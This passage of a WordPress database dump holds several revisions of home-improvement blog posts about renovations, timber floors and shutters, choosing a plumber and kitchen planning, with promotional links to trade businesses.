<li>Help protect from future stains</li>\r\n</ul>\r\n<img class=\"alignleft size-full wp-image-250\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo.jpg\" alt=\"\" width=\"25%\" height=\"1500\" />Complete renovations, for example fitting a new kitchen, can set you back at least £30,000 and can be an unnecessary cost.\r\n\r\nHome renovations and improvements are about making use of the space you have, for example, if you want extra space why not make more room in your house by knocking down walls or adding a loft conversion rather than moving.\r\n\r\n<a href=\"https://www.sovereignhomes.com.au/testimonials/\">Renovation builders</a> provide a straight-forward solution and service that will take care of everything right from the initial stages.\r\n\r\nThese home builders are there for their clients 100% and are on hand to supply advice and help with decision making when it comes to making cost-effecting changes.\r\n<h3>Custom Builders</h3>\r\nThere are many professional companies that specialise in custom builds and renovations, who are there to assist you if you\'re looking to upgrade and <a href=\"https://brightside.me/creativity-home/10-cool-interior-design-tricks-to-transform-your-house-359310/\">transform your home</a> on a budget.\r\n\r\nCustom home builders can help you makeover your space in a modern way and will be there to cover every aspect and work to all standards. They will be there to keep your project organised and ensure the working process is smooth by conferring with consultants and specialists.\r\n\r\nAll you will need to do is <a href=\"https://www.apartmenttherapy.com/mapping-out-your-dream-house-4-questions-to-ask-yourself-212499\">envision your dream home</a> and even choose the materials and supplies if you wish to be more involved.','What home renovations add the most value?','','inherit','closed','closed','','248-revision-v1','','','2019-12-18 12:37:29','2019-12-18 12:37:29','',248,'https://housing-today.co.uk/blog/248-revision-v1',0,'revision','',0),(252,1,'2019-12-18 17:39:08','2019-12-18 17:39:08','<h3 class=\"alignnone\"><img class=\"aligncenter size-full wp-image-249\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-2098443.jpeg\" alt=\"\" width=\"2250\" height=\"1500\" /></h3>\n<h3 class=\"alignnone\">Do you wish you could create a fresh new living space and environment without the hassle of packing up and moving?</h3>\nHome renovations and refurbishments have the ability to do exactly this - leaving you stress-free.\n\nCustom builders, who take on home renovation projects take care of everything from design to execution and it\'s all managed under one company.\n\nSo, you can feel ensured that the renovation will be handled properly and every detail will be taken care of. It also means that you will have the freedom to be creative and design what will be your dream home, without having to build it from scratch.\n\nHere, we\'ll let you know the two home renovation projects you can take on that will add the most value to your home. Scroll below...\n<h3><strong>What is a renovation?</strong></h3>\nTaking on a renovation project doesn\'t have to translate to remodelling the entire house. It can simply mean upgrading things like flooring, giving the place a fresh lick of paint and improving your electrics.\n\nBelieve it or not, but flooring is actually majorly overlooked when it comes to renovations and this can be because it can be very costly. But there are ways to <a href=\"https://abeautifulmess.com/2018/03/ways-to-save-money-on-a-home-renovation.html\">cut corners</a>.\n\nYou don\'t need to fit a brand new floor around the house to give your property a fresh new look.\n\nSo, why not instead have your flooring and carpets cleaned professionally to make them feel like brand new?\n\nWhen it comes to having your carpets cleaned make sure to track down reputable carpet cleaners that will be able to offer you specialist advice leaving you feeling ensured that you will receive the best service.\n\n<a href=\"https://www.freshairecarpetcleaning.com.au/\">Professional carpet cleaners</a> can help you:\n<ul>\n <li>Remove stains</li>\n <li>Fight away odours</li>\n <li>Clean tiles & grouting</li>\n <li>Help protect from future stains</li>\n</ul>\n<img class=\"alignleft size-full wp-image-250\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo.jpg\" alt=\"\" width=\"25%\" height=\"1500\" />Complete renovations, for example fitting a new kitchen, can set you back at least £30,000 and can be an unnecessary cost.\n\nHome renovations and improvements are about making use of the space you have, for example, if you want extra space why not make more room in your house by knocking down walls or adding a loft conversion rather than moving.\n\n<a href=\"https://www.sovereignhomes.com.au/testimonials/\">Renovation builders</a> provide a straight-forward solution and service that will take care of everything right from the initial stages.\n\nThese home builders are there for their clients 100% and are on hand to supply advice and help with decision making when it comes to making cost-effecting changes.\n<h3>Custom Builders</h3>\nThere are many professional companies that specialise in custom builds and renovations, who are there to assist you if you\'re looking to upgrade and <a href=\"https://brightside.me/creativity-home/10-cool-interior-design-tricks-to-transform-your-house-359310/\">transform your home</a> on a budget.\n\nCustom home builders can help you makeover your space in a modern way and will be there to cover every aspect and work to all standards. They will be there to keep your project organised and ensure the working process is smooth by conferring with consultants and specialists.\n\nAll you will need to do is <a href=\"https://www.apartmenttherapy.com/mapping-out-your-dream-house-4-questions-to-ask-yourself-212499\">envision your dream home</a> and even choose the materials and supplies if you wish to be more involved.','What home renovations add the most value?','','inherit','closed','closed','','248-autosave-v1','','','2019-12-18 17:39:08','2019-12-18 17:39:08','',248,'https://housing-today.co.uk/blog/248-autosave-v1',0,'revision','',0),(253,1,'2019-12-18 17:39:50','2019-12-18 17:39:50','<h3 class=\"alignnone\"><img class=\"aligncenter size-full wp-image-249\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-2098443.jpeg\" alt=\"\" width=\"2250\" height=\"1500\" /></h3>\r\n<h3 class=\"alignnone\">Do you wish you could create a fresh new living space and environment without the hassle of packing up and moving?</h3>\r\nHome renovations and refurbishments have the ability to do exactly this - leaving you stress-free.\r\n\r\nCustom builders, who take on home renovation projects take care of everything from design to execution and it\'s all managed under one company.\r\n\r\nSo, you can feel ensured that the renovation will be handled properly and every detail will be taken care of. It also means that you will have the freedom to be creative and design what will be your dream home, without having to build it from scratch.\r\n\r\nHere, we\'ll let you know the two home renovation projects you can take on that will add the most value to your home. Scroll below...\r\n<h3><strong>What is a renovation?</strong></h3>\r\nTaking on a renovation project doesn\'t have to translate to remodelling the entire house. It can simply mean upgrading things like flooring, giving the place a fresh lick of paint and improving your electrics.\r\n\r\nBelieve it or not, but flooring is actually majorly overlooked when it comes to renovations and this can be because it can be very costly. But there are ways to <a href=\"https://abeautifulmess.com/2018/03/ways-to-save-money-on-a-home-renovation.html\">cut corners</a>.\r\n\r\nYou don\'t need to fit a brand new floor around the house to give your property a fresh new look.\r\n\r\nSo, why not instead have your flooring and carpets cleaned professionally to make them feel like brand new?\r\n\r\nWhen it comes to having your carpets cleaned make sure to track down reputable carpet cleaners that will be able to <a href=\"https://www.freshairecarpetcleaning.com.au/services/rental-properties-carpet-tile-cleaning/\" target=\"_blank\">offer you specialist advice</a> leaving you feeling ensured that you will receive the best service.\r\n\r\nProfessional carpet cleaners can help you:\r\n<ul>\r\n <li>Remove stains</li>\r\n <li>Fight away odours</li>\r\n <li>Clean tiles & grouting</li>\r\n <li>Help protect from future stains</li>\r\n</ul>\r\n<img class=\"alignleft size-full wp-image-250\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo.jpg\" alt=\"\" width=\"25%\" height=\"1500\" />Complete renovations, for example fitting a new kitchen, can set you back at least £30,000 and can be an unnecessary cost.\r\n\r\nHome renovations and improvements are about making use of the space you have, for example, if you want extra space why not make more room in your house by knocking down walls or adding a loft conversion rather than moving.\r\n\r\n<a href=\"https://www.sovereignhomes.com.au/testimonials/\">Renovation builders</a> provide a straight-forward solution and service that will take care of everything right from the initial stages.\r\n\r\nThese home builders are there for their clients 100% and are on hand to supply advice and help with decision making when it comes to making cost-effecting changes.\r\n<h3>Custom Builders</h3>\r\nThere are many professional companies that specialise in custom builds and renovations, who are there to assist you if you\'re looking to upgrade and <a href=\"https://brightside.me/creativity-home/10-cool-interior-design-tricks-to-transform-your-house-359310/\">transform your home</a> on a budget.\r\n\r\nCustom home builders can help you makeover your space in a modern way and will be there to cover every aspect and work to all standards. They will be there to keep your project organised and ensure the working process is smooth by conferring with consultants and specialists.\r\n\r\nAll you will need to do is <a href=\"https://www.apartmenttherapy.com/mapping-out-your-dream-house-4-questions-to-ask-yourself-212499\">envision your dream home</a> and even choose the materials and supplies if you wish to be more involved.','What home renovations add the most value?','','inherit','closed','closed','','248-revision-v1','','','2019-12-18 17:39:50','2019-12-18 17:39:50','',248,'https://housing-today.co.uk/blog/248-revision-v1',0,'revision','',0),(254,1,'2019-12-18 17:45:49','2019-12-18 17:45:49','If there are two things homeowners and even prospective buyers want from their property it\'s to add value and increase the privacy to their property. And who can really blame them?\r\n\r\nPrivacy in your home is a must-have.\r\n\r\nIt helps you to feel safe and secure and allows you to go about your business without the fear of nosy bypassers peering through.\r\n\r\nSo, why not <a href=\"https://www.propertypriceadvice.co.uk/home-improvements/ten-of-the-best-ways-to-add-value-to-your-home\">add value</a> to your home and <a href=\"https://www.netmums.com/coffeehouse/home-garden-194/cleaning-14/994558-i-dont-feel-safe-my-own-home.html\">increase its privacy</a> at the same time?\r\n\r\nAnd believe it or not, it can be done without even breaking the bank. Here\'s how...\r\n<h2>1. Timber Floors</h2>\r\nThere are no other flooring products that actually compare to <a href=\"https://www.heartwoodfloors.com.au/\">timber floors</a>. In comparison to carpet, which only lasts at most 15 years, timber floors actually will last over 100. This means that there is nothing more durable on the market, or nothing as stylish.\r\n\r\nOn top of this, timber floors require little to no maintenance whatsoever and are incredibly easy to clean.\r\n\r\nThis is because they don\'t store dirt like carpet and adds a great touch of premium quality to your home, which can make it feel more expensive.\r\n\r\nTimber floors are also a great natural and sustainable material, unlike other floor coverings, which take their toll on nature.\r\n\r\n \r\n<h3></h3>\r\n<h4>Benefits of hardwood flooring:</h4>\r\n<ul>\r\n <li>Easy to maintain</li>\r\n <li>Long-lasting</li>\r\n <li>Easy to clean</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-243\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\" alt=\"\" width=\"2254\" height=\"1500\" />\r\n<h2>2. Wood or timber Shutters Anyone?</h2>\r\nAnother sustainable resource is timber shutters. They are a great extra layer for privacy and protection and are great at keeping out cold air as well as hot heats in the summertime.\r\n\r\nThey have warm, natural tones, which will make your home look more expensive and can fit any style from traditional to modern and is truly timeless.\r\n\r\nAnd when it comes to colour choices and complete customisation the choice is endless, which means that you will find something perfect for you.\r\n\r\nAs they are very easy to maintain and keep clean, all you will need to do is vacuum or dust the blinds every other week to remove dust.\r\n\r\nBenefits of timber shutters include Low maintenance, Added privacy and protection and are v easy to keep clean. <a href=\"https://www.heartwoodshutters.com.au/products/timber-shutters/\" target=\"_blank\">More here.</a>\r\n<h2>3. Other ways to add value to your home</h2>\r\n<ul>\r\n <li>Loft conversions</li>\r\n <li>Apply for planning permission</li>\r\n <li>Take care of your garden and exterior with landscaping</li>\r\n <li>Makeover your bathroom</li>\r\n</ul>','How to add value and privacy to your home','','inherit','closed','closed','','242-revision-v1','','','2019-12-18 17:45:49','2019-12-18 17:45:49','',242,'https://housing-today.co.uk/blog/242-revision-v1',0,'revision','',0),(255,1,'2019-12-18 18:07:53','2019-12-18 18:07:53','If there are two things homeowners and even prospective buyers want from their property it\'s to add value and increase the privacy to their property. And who can really blame them?\n\nPrivacy in your home is a must-have.\n\nIt helps you to feel safe and secure and allows you to go about your business without the fear of nosy bypassers peering through.\n\nSo, why not <a href=\"https://www.propertypriceadvice.co.uk/home-improvements/ten-of-the-best-ways-to-add-value-to-your-home\">add value</a> to your home and <a href=\"https://www.netmums.com/coffeehouse/home-garden-194/cleaning-14/994558-i-dont-feel-safe-my-own-home.html\">increase its privacy</a> at the same time?\n\nAnd believe it or not, it can be done without even breaking the bank. Here\'s how...\n<h2>1. Timber Floors</h2>\nThere are no other flooring products that actually compare to timber floors. In comparison to carpet, which only lasts at most 15 years, timber floors actually will last over 100. This means that there is nothing more durable on the market, or <a href=\"https://heartwoodfloors.com.au/flooring-products/\" target=\"_blank\">nothing as stylish</a>.\n\nOn top of this, timber floors require little to no maintenance whatsoever and are incredibly easy to clean.\n\nThis is because they don\'t store dirt like carpet and adds a great touch of premium quality to your home, which can make it feel more expensive.\n\nTimber floors are also a great natural and sustainable material, unlike other floor coverings, which take their toll on nature.\n\n \n<h4>Benefits of hardwood flooring:</h4>\n<ul>\n <li>Easy to maintain</li>\n <li>Long-lasting</li>\n <li>Easy to clean</li>\n</ul>\n<img class=\"alignnone size-full wp-image-243\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\" alt=\"\" width=\"2254\" height=\"1500\" />\n<h2>2. Wood or timber Shutters Anyone?</h2>\nAnother sustainable resource is timber shutters. They are a great extra layer for privacy and protection and are great at keeping out cold air as well as hot heats in the summertime.\n\nThey have warm, natural tones, which will make your home look more expensive and can fit any style from traditional to modern and is truly timeless.\n\nAnd when it comes to colour choices and complete customisation the choice is endless, which means that you will find something perfect for you.\n\nAs they are very easy to maintain and keep clean, all you will need to do is vacuum or dust the blinds every other week to remove dust.\n\nBenefits of timber shutters include Low maintenance, Added privacy and protection and are v easy to keep clean. <a href=\"https://www.heartwoodshutters.com.au/products/timber-shutters/\" target=\"_blank\">More here.</a>\n<h2>3. Other ways to add value to your home</h2>\n<ul>\n <li>Loft conversions</li>\n <li>Apply for planning permission</li>\n <li>Take care of your garden and exterior with landscaping</li>\n <li>Makeover your bathroom</li>\n</ul>','How to add value and privacy to your home','','inherit','closed','closed','','242-autosave-v1','','','2019-12-18 18:07:53','2019-12-18 18:07:53','',242,'https://housing-today.co.uk/blog/242-autosave-v1',0,'revision','',0),(256,1,'2019-12-18 18:08:22','2019-12-18 18:08:22','If there are two things homeowners and even prospective buyers want from their property it\'s to add value and increase the privacy to their property. And who can really blame them?\r\n\r\nPrivacy in your home is a must-have.\r\n\r\nIt helps you to feel safe and secure and allows you to go about your business without the fear of nosy bypassers peering through.\r\n\r\nSo, why not <a href=\"https://www.propertypriceadvice.co.uk/home-improvements/ten-of-the-best-ways-to-add-value-to-your-home\">add value</a> to your home and <a href=\"https://www.netmums.com/coffeehouse/home-garden-194/cleaning-14/994558-i-dont-feel-safe-my-own-home.html\">increase its privacy</a> at the same time?\r\n\r\nAnd believe it or not, it can be done without even breaking the bank. Here\'s how...\r\n<h2>1. Timber Floors</h2>\r\nThere are no other flooring products that actually compare to timber floors. In comparison to carpet, which only lasts at most 15 years, timber floors actually will last over 100. This means that there is nothing more durable on the market, or <a href=\"https://heartwoodfloors.com.au/flooring-products/\" target=\"_blank\">nothing as stylish</a>.\r\n\r\nOn top of this, timber floors require little to no maintenance whatsoever and are incredibly easy to clean.\r\n\r\nThis is because they don\'t store dirt like carpet and adds a great touch of premium quality to your home, which can make it feel more expensive.\r\n\r\nTimber floors are also a great natural and sustainable material, unlike other floor coverings, which take their toll on nature.\r\n\r\n \r\n<h4>Benefits of hardwood flooring:</h4>\r\n<ul>\r\n <li>Easy to maintain</li>\r\n <li>Long-lasting</li>\r\n <li>Easy to clean</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-243\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\" alt=\"\" width=\"2254\" height=\"1500\" />\r\n<h2>2. Wood or timber Shutters Anyone?</h2>\r\nAnother sustainable resource is timber shutters. They are a great extra layer for privacy and protection and are great at keeping out cold air as well as hot heats in the summertime.\r\n\r\nThey have warm, natural tones, which will make your home look more expensive and can fit any style from traditional to modern and is truly timeless.\r\n\r\nAnd when it comes to colour choices and complete customisation the choice is endless, which means that you will find something perfect for you.\r\n\r\nAs they are very easy to maintain and keep clean, all you will need to do is vacuum or dust the blinds every other week to remove dust.\r\n\r\nBenefits of timber shutters include Low maintenance, Added privacy and protection and are v easy to keep clean. <a href=\"https://www.heartwoodshutters.com.au/products/timber-shutters/\" target=\"_blank\">More here.</a>\r\n<h2>3. Other ways to add value to your home</h2>\r\n<ul>\r\n <li>Loft conversions</li>\r\n <li>Apply for planning permission</li>\r\n <li>Take care of your garden and exterior with landscaping</li>\r\n <li>Makeover your bathroom</li>\r\n</ul>','How to add value and privacy to your home','','inherit','closed','closed','','242-revision-v1','','','2019-12-18 18:08:22','2019-12-18 18:08:22','',242,'https://housing-today.co.uk/blog/242-revision-v1',0,'revision','',0),(257,1,'2019-12-18 18:08:36','2019-12-18 18:08:36','If there are two things homeowners and even prospective buyers want from their property it\'s to add value and increase the privacy to their property. And who can really blame them?\r\n\r\nPrivacy in your home is a must-have.\r\n\r\nIt helps you to feel safe and secure and allows you to go about your business without the fear of nosy bypassers peering through.\r\n\r\nSo, why not <a href=\"https://www.propertypriceadvice.co.uk/home-improvements/ten-of-the-best-ways-to-add-value-to-your-home\">add value</a> to your home and <a href=\"https://www.netmums.com/coffeehouse/home-garden-194/cleaning-14/994558-i-dont-feel-safe-my-own-home.html\">increase its privacy</a> at the same time?\r\n\r\nAnd believe it or not, it can be done without even breaking the bank. Here\'s how...\r\n<h2>1. Timber Floors</h2>\r\n<strong>60% Off Timber Floors | Premium Flooring Products</strong>\r\n\r\nThere are no other flooring products that actually compare to timber floors. In comparison to carpet, which only lasts at most 15 years, timber floors actually will last over 100. This means that there is nothing more durable on the market, or <a href=\"https://heartwoodfloors.com.au/flooring-products/\" target=\"_blank\">nothing as stylish</a>.\r\n\r\nOn top of this, timber floors require little to no maintenance whatsoever and are incredibly easy to clean.\r\n\r\nThis is because they don\'t store dirt like carpet and adds a great touch of premium quality to your home, which can make it feel more expensive.\r\n\r\nTimber floors are also a great natural and sustainable material, unlike other floor coverings, which take their toll on nature.\r\n\r\n \r\n<h4>Benefits of hardwood flooring:</h4>\r\n<ul>\r\n <li>Easy to maintain</li>\r\n <li>Long-lasting</li>\r\n <li>Easy to clean</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-243\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\" alt=\"\" width=\"2254\" height=\"1500\" />\r\n<h2>2. Wood or timber Shutters Anyone?</h2>\r\nAnother sustainable resource is timber shutters. They are a great extra layer for privacy and protection and are great at keeping out cold air as well as hot heats in the summertime.\r\n\r\nThey have warm, natural tones, which will make your home look more expensive and can fit any style from traditional to modern and is truly timeless.\r\n\r\nAnd when it comes to colour choices and complete customisation the choice is endless, which means that you will find something perfect for you.\r\n\r\nAs they are very easy to maintain and keep clean, all you will need to do is vacuum or dust the blinds every other week to remove dust.\r\n\r\nBenefits of timber shutters include Low maintenance, Added privacy and protection and are v easy to keep clean. <a href=\"https://www.heartwoodshutters.com.au/products/timber-shutters/\" target=\"_blank\">More here.</a>\r\n<h2>3. Other ways to add value to your home</h2>\r\n<ul>\r\n <li>Loft conversions</li>\r\n <li>Apply for planning permission</li>\r\n <li>Take care of your garden and exterior with landscaping</li>\r\n <li>Makeover your bathroom</li>\r\n</ul>','How to add value and privacy to your home','','inherit','closed','closed','','242-revision-v1','','','2019-12-18 18:08:36','2019-12-18 18:08:36','',242,'https://housing-today.co.uk/blog/242-revision-v1',0,'revision','',0),(259,1,'2020-08-20 14:06:48','2020-08-20 14:06:48','<a href=\"https://housing-today.co.uk/\"><img class=\"aligncenter size-full wp-image-234\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing4.jpg\" alt=\"highly-qualified plumbers and heating engineers are specialists in their fields and often fix issues quickly, neatly and efficiently.\" width=\"960\" height=\"640\" /></a>\r\n<h2><a href=\"https://housing-today.co.uk/home-interior/\">Choosing a reliable tradesperson</a></h2>\r\nPicture this: a leak springs up in your house.\r\n\r\nYou don’t feel equipped to deal with it, maybe it’s your first home, or you have never dealt with anything related to the inner workings of your house before.\r\n\r\nIdeally, you want the problem solved as quickly as possible, but you must be careful when choosing a tradesperson or plumber.\r\n<h3>Do your research</h3>\r\nIt can be tempting to choose the first person or company that appears when you search online, but research is imperative to make sure you choose a reputable tradesperson.\r\n\r\nYou might wonder, if someone is working as a plumber, does that not mean they are all equally qualified?\r\n\r\nIn theory, yes, but there are unfortunately rogue tradespeople who may do an arguably poor job of fixing the problem, just to make some easy money.\r\n<h3>What makes a good tradesperson/plumber?</h3>\r\nIf you ask friends and family, it can be a bit of minefield when determining what makes a good tradesperson, but there are a few handy tips to keep in mind.\r\n\r\nEven if you are dealing with a plumbing emergency, take the time to find a reputable plumber, if you live in London try <a href=\"https://thejandpgroup.co.uk/london\">J&P</a>.\r\n\r\nSome directories do not ask for proper certification or undertake the appropriate background checks before listing a tradesperson, which can make it extremely difficult to find a reputable plumber.\r\n\r\nOnline directories may also offer paid-for listings, meaning tradespeople can simply create a profile and work without any thorough checks.\r\n<h3>Choose experience</h3>\r\nYou should try to find an agency or company that sets a benchmark of experience for its workers.\r\n\r\nMost companies will not take on engineers without a minimum of five years’ experience in their relevant trades and they must all undergo a thorough background and qualification check.\r\n\r\nIf you find an independent plumber, it is fine to ask to see evidence of qualifications and training.\r\n\r\nReviews can also be helpful to scope out whether a plumber has provided a good service, but it is important to look out for fake reviews.\r\n\r\nIf all the reviews sound like they have been written by the same person, or those reviewing have only ever posted one review, this might be grounds for suspicion.\r\n<h3>Read more:</h3>\r\n<ul>\r\n <li><a href=\"https://housing-today.co.uk/home-interior/home-renovations-add-value\">What home renovations add the most value?</a></li>\r\n <li><a href=\"https://housing-today.co.uk/home-interior/add-value-privacy-home\">How to add value and privacy to your home</a></li>\r\n <li><a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\">The best way to choose an electrician</a></li>\r\n <li><a href=\"https://housing-today.co.uk/blog/creating-your-perfect-kitchen\">Creating your perfect kitchen</a></li>\r\n <li><a href=\"https://housing-today.co.uk/blog/moving-home-checklist-tips-ease-stress\">Moving home checklist: tips to ease stress</a></li>\r\n</ul>','Choosing a plumber','','publish','closed','closed','','choosing-a-plumber','','','2020-08-20 14:08:13','2020-08-20 14:08:13','',245,'https://housing-today.co.uk/?page_id=259',0,'page','',0),(260,1,'2020-08-20 14:00:56','2020-08-20 14:00:56','<h2>Choosing a reliable tradesperson</h2>\r\nPicture this: a leak springs up in your house.\r\n\r\nYou don’t feel equipped to deal with it, maybe it’s your first home, or you have never dealt with anything related to the inner workings of your house before.\r\n\r\nIdeally, you want the problem solved as quickly as possible, but you must be careful when choosing a tradesperson or plumber.\r\n<h3>Do your research</h3>\r\nIt can be tempting to choose the first person or company that appears when you search online, but research is imperative to make sure you choose a reputable tradesperson.\r\n\r\nYou might wonder, if someone is working as a plumber, does that not mean they are all equally qualified?\r\n\r\nIn theory, yes, but there are unfortunately rogue tradespeople who may do an arguably poor job of fixing the problem, just to make some easy money.\r\n<h3>What makes a good tradesperson/plumber?</h3>\r\nIf you ask friends and family, it can be a bit of minefield when determining what makes a good tradesperson, but there are a few handy tips to keep in mind.\r\n\r\nEven if you are dealing with a plumbing emergency, take the time to find a reputable plumber.\r\n\r\nSome directories do not ask for proper certification or undertake the appropriate background checks before listing a tradesperson, which can make it extremely difficult to find a reputable plumber.\r\n\r\nOnline directories may also offer paid-for listings, meaning tradespeople can simply create a profile and work without any thorough checks.\r\n<h3>Choose experience</h3>\r\nYou should try to find an agency or company that sets a benchmark of experience for its workers.\r\n\r\nMost companies will not take on engineers without a minimum of five years’ experience in their relevant trades and they must all undergo a thorough background and qualification check.\r\n\r\nIf you find an independent plumber, it is fine to ask to see evidence of qualifications and training.\r\n\r\nReviews can also be helpful to scope out whether a plumber has provided a good service, but it is important to look out for fake reviews.\r\n\r\nIf all the reviews sound like they have been written by the same person, or those reviewing have only ever posted one review, this might be grounds for suspicion.','Choosing a plumber','','inherit','closed','closed','','259-revision-v1','','','2020-08-20 14:00:56','2020-08-20 14:00:56','',259,'https://housing-today.co.uk/blog/259-revision-v1',0,'revision','',0),(261,1,'2020-08-20 14:06:48','2020-08-20 14:06:48','<a href=\"https://housing-today.co.uk/\"><img class=\"aligncenter size-full wp-image-234\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing4.jpg\" alt=\"highly-qualified plumbers and heating engineers are specialists in their fields and often fix issues quickly, neatly and efficiently.\" width=\"960\" height=\"640\" /></a>\r\n<h2><a href=\"https://housing-today.co.uk/home-interior/\">Choosing a reliable tradesperson</a></h2>\r\nPicture this: a leak springs up in your house.\r\n\r\nYou don’t feel equipped to deal with it, maybe it’s your first home, or you have never dealt with anything related to the inner workings of your house before.\r\n\r\nIdeally, you want the problem solved as quickly as possible, but you must be careful when choosing a tradesperson or plumber.\r\n<h3>Do your research</h3>\r\nIt can be tempting to choose the first person or company that appears when you search online, but research is imperative to make sure you choose a reputable tradesperson.\r\n\r\nYou might wonder, if someone is working as a plumber, does that not mean they are all equally qualified?\r\n\r\nIn theory, yes, but there are unfortunately rogue tradespeople who may do an arguably poor job of fixing the problem, just to make some easy money.\r\n<h3>What makes a good tradesperson/plumber?</h3>\r\nIf you ask friends and family, it can be a bit of minefield when determining what makes a good tradesperson, but there are a few handy tips to keep in mind.\r\n\r\nEven if you are dealing with a plumbing emergency, take the time to find a reputable plumber, if you live in London try <a href=\"https://thejandpgroup.co.uk/london\">J&P</a>.\r\n\r\nSome directories do not ask for proper certification or undertake the appropriate background checks before listing a tradesperson, which can make it extremely difficult to find a reputable plumber.\r\n\r\nOnline directories may also offer paid-for listings, meaning tradespeople can simply create a profile and work without any thorough checks.\r\n<h3>Choose experience</h3>\r\nYou should try to find an agency or company that sets a benchmark of experience for its workers.\r\n\r\nMost companies will not take on engineers without a minimum of five years’ experience in their relevant trades and they must all undergo a thorough background and qualification check.\r\n\r\nIf you find an independent plumber, it is fine to ask to see evidence of qualifications and training.\r\n\r\nReviews can also be helpful to scope out whether a plumber has provided a good service, but it is important to look out for fake reviews.\r\n\r\nIf all the reviews sound like they have been written by the same person, or those reviewing have only ever posted one review, this might be grounds for suspicion.\r\n<h3>Read more:</h3>\r\n<ul>\r\n <li><a href=\"https://housing-today.co.uk/home-interior/home-renovations-add-value\">What home renovations add the most value?</a></li>\r\n <li><a href=\"https://housing-today.co.uk/home-interior/add-value-privacy-home\">How to add value and privacy to your home</a></li>\r\n <li><a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\">The best way to choose an electrician</a></li>\r\n <li><a href=\"https://housing-today.co.uk/blog/creating-your-perfect-kitchen\">Creating your perfect kitchen</a></li>\r\n <li>Moving home checklist: tips to ease stress</li>\r\n</ul>','Choosing a plumber','','inherit','closed','closed','','259-revision-v1','','','2020-08-20 14:06:48','2020-08-20 14:06:48','',259,'https://housing-today.co.uk/blog/259-revision-v1',0,'revision','',0),(262,1,'2020-08-20 14:07:49','2020-08-20 14:07:49',' ','','','publish','closed','closed','','262','','','2020-08-20 14:07:49','2020-08-20 14:07:49','',245,'https://housing-today.co.uk/?p=262',3,'nav_menu_item','',0),(263,1,'2020-08-20 14:08:13','2020-08-20 14:08:13','<a href=\"https://housing-today.co.uk/\"><img class=\"aligncenter size-full wp-image-234\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing4.jpg\" alt=\"highly-qualified plumbers and heating engineers are specialists in their fields and often fix issues quickly, neatly and efficiently.\" width=\"960\" height=\"640\" /></a>\r\n<h2><a href=\"https://housing-today.co.uk/home-interior/\">Choosing a reliable tradesperson</a></h2>\r\nPicture this: a leak springs up in your house.\r\n\r\nYou don’t feel equipped to deal with it, maybe it’s your first home, or you have never dealt with anything related to the inner workings of your house before.\r\n\r\nIdeally, you want the problem solved as quickly as possible, but you must be careful when choosing a tradesperson or plumber.\r\n<h3>Do your research</h3>\r\nIt can be tempting to choose the first person or company that appears when you search online, but research is imperative to make sure you choose a reputable tradesperson.\r\n\r\nYou might wonder, if someone is working as a plumber, does that not mean they are all equally qualified?\r\n\r\nIn theory, yes, but there are unfortunately rogue tradespeople who may do an arguably poor job of fixing the problem, just to make some easy money.\r\n<h3>What makes a good tradesperson/plumber?</h3>\r\nIf you ask friends and family, it can be a bit of minefield when determining what makes a good tradesperson, but there are a few handy tips to keep in mind.\r\n\r\nEven if you are dealing with a plumbing emergency, take the time to find a reputable plumber, if you live in London try <a href=\"https://thejandpgroup.co.uk/london\">J&P</a>.\r\n\r\nSome directories do not ask for proper certification or undertake the appropriate background checks before listing a tradesperson, which can make it extremely difficult to find a reputable plumber.\r\n\r\nOnline directories may also offer paid-for listings, meaning tradespeople can simply create a profile and work without any thorough checks.\r\n<h3>Choose experience</h3>\r\nYou should try to find an agency or company that sets a benchmark of experience for its workers.\r\n\r\nMost companies will not take on engineers without a minimum of five years’ experience in their relevant trades and they must all undergo a thorough background and qualification check.\r\n\r\nIf you find an independent plumber, it is fine to ask to see evidence of qualifications and training.\r\n\r\nReviews can also be helpful to scope out whether a plumber has provided a good service, but it is important to look out for fake reviews.\r\n\r\nIf all the reviews sound like they have been written by the same person, or those reviewing have only ever posted one review, this might be grounds for suspicion.\r\n<h3>Read more:</h3>\r\n<ul>\r\n <li><a href=\"https://housing-today.co.uk/home-interior/home-renovations-add-value\">What home renovations add the most value?</a></li>\r\n <li><a href=\"https://housing-today.co.uk/home-interior/add-value-privacy-home\">How to add value and privacy to your home</a></li>\r\n <li><a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\">The best way to choose an electrician</a></li>\r\n <li><a href=\"https://housing-today.co.uk/blog/creating-your-perfect-kitchen\">Creating your perfect kitchen</a></li>\r\n <li><a href=\"https://housing-today.co.uk/blog/moving-home-checklist-tips-ease-stress\">Moving home checklist: tips to ease stress</a></li>\r\n</ul>','Choosing a plumber','','inherit','closed','closed','','259-revision-v1','','','2020-08-20 14:08:13','2020-08-20 14:08:13','',259,'https://housing-today.co.uk/blog/259-revision-v1',0,'revision','',0),(267,1,'2021-02-01 12:26:04','2021-02-01 12:26:04','<h2 class=\"LC20lb\">Planning - The Guide to Creating the Perfect Kitchen</h2>\nSince the kitchen is now seen as the hub of the household, you will more than likely want it to feel homely and warm.\n\nDespite their clean lines, minimal colour and <em><strong>smart design</strong></em>, even contemporary <a href=\"https://www.pinterest.co.uk/brendadrescher/luxury-kitchens/\" target=\"_blank\" rel=\"noopener noreferrer\">luxury kitchens</a> can appear welcoming.\n\nThis is often due to cleverly positioned lighting, which in turn works to create a homely atmosphere.\n<h2>Flooring</h2>\nAs well as <em><strong>granite worktops</strong></em>, some companies provide an extensive range of <a 